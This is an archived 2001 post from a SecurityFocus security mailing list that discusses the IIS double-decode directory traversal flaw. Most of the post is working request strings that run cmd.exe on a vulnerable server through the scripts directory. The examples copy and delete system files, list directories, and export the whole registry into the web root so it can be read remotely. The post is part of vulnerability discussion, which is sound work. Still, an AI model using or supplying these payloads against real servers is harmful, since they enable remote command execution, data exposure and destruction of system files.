I've tried vairous combinations myself. You can call any vaild cmd.exe DOS command. Example: Copy: scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.e xe+c:\Mycopy.exe Delete: scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.ex e+c:\Mycopy.exe Dir with /w scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w Here's a cool one: Dump the registry to a text file and view from web... :) scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\ registry.txt When executing the cmd.exe through IIS, you only have a one shot. However, when you are in the DOS Shell, you have the advantage of the Shell to parse your command lines. Ie. >dir /w | cmd You will not be able to memic this through IIS, due to the absence of the DOS Shell. my 2 cents. ______ /_____/\ Harry Steinmeyer /____ \\ \ Senior Programmer /_____\ \\ / Winn-Dixie, Inc. /_____/ \/ / / /_____/ / \//\ rm -rf /bin/laden \_____\//\ / / \_____/ / /\ / \_____/ \\ \ \_____\ \\ \_____\/ "Science without religion is lame, religion without science is blind." Einstein, Albert (1879-1955) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Oct 24 2001 - 14:31:50 PDT